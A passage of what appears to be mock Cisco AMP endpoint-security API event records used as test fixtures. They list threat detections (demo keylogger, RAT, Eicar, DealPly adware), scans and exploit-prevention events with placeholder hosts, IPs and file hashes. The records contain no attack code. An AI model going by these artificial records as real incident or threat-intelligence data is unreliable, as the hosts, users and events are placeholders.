Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255807366103064","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255777301332000,"timestamp":1610705088,"timestamp_nanoseconds":259000000,"date":"2021-01-15T10:04:48+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255777301331991","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832267006136549000,"timestamp":1610705083,"timestamp_nanoseconds":294000000,"date":"2021-01-15T10:04:43+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla Firefox","clean":true,"scanned_files":97,"scanned_processes":0,"scanned_paths":11,"malicious_detections":0}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832266988956680000,"timestamp":1610705079,"timestamp_nanoseconds":544000000,"date":"2021-01-15T10:04:39+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"C:\\Program Files\\Mozilla Firefox"}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255730056692000,"timestamp":1610705077,"timestamp_nanoseconds":58000000,"date":"2021-01-15T10:04:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255730056691734","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255674222117000,"timestamp":1610705064,"timestamp_nanoseconds":609000000,"date":"2021-01-15T10:04:24+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255674222116885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055368265531000,"timestamp":1610705053,"timestamp_nanoseconds":870000000,"date":"2021-01-15T10:04:13+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055368265531411","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255622682509000,"timestamp":1610705052,"timestamp_nanoseconds":800000000,"date":"2021-01-15T10:04:12+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255622682509332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055359675597000,"timestamp":1610705051,"timestamp_nanoseconds":682000000,"date":"2021-01-15T10:04:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055359675596818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055355380630000,"timestamp":1610705050,"timestamp_nanoseconds":667000000,"date":"2021-01-15T10:04:10+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055355380629521","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1ds","file_path":"\\\\?\\C:\\WINDOWS\\system32\\config\\systemprofile\\Desktop\\s1ds","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662224","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055351085662000,"timestamp":1610705049,"timestamp_nanoseconds":198000000,"date":"2021-01-15T10:04:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055351085662223","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\4","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":885000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694926","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055346790695000,"timestamp":1610705048,"timestamp_nanoseconds":760000000,"date":"2021-01-15T10:04:08+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Keylogger","detection_id":"5827055346790694925","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2","file_path":"\\\\?\\C:\\WINDOWS\\Temp\\2","identity":{"sha256":"4958e30478a020d970f11c99a0fc48c3f435b76da1b70e5a9e3b93c923be3b42","sha1":"89fbf9dea60c302e51a7aac6c4fd881575e65667","md5":"e218660e1cec5b5baa34f62c1c1860dc"},"parent":{"process_id":1468,"disposition":"Clean","file_name":"spoolsv.exe","identity":{"sha256":"130d686a220af97ebf33dd481b79990f259b4ee38dd95a35cd3d0f0517790ff0","sha1":"0e5d1a09a103eae3bd693c7a1c7531fde2e2402b","md5":"d8e14a61acc1d4a6cd0d38aebac7fa3b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:04:06+00:00","event_type_id":1090519104,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":928000000,"date":"2021-01-15T10:04:06+00:00","event_type":"Exploit Prevention","event_type_id":1090519103,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe","attacked_module":"C:\\Program Files\\Mozilla Firefox\\xul.dll","base_address":"0x7D1E0000","suspicious_files":[""],"indicators":[{"tactics":["TA0009"],"severity":"medium","description":"DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.","short_description":"Dealply adware detected","id":"44cfe1c4-3dc4-4619-be6b-88c9d69c2a97","techniques":["T1185"]}]}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055321020891000,"timestamp":1610705042,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:04:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055321020891148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s234","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s234","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255571142902000,"timestamp":1610705040,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:04:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255571142901779","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055308135989000,"timestamp":1610705039,"timestamp_nanoseconds":416000000,"date":"2021-01-15T10:03:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055308135989259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":354000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} 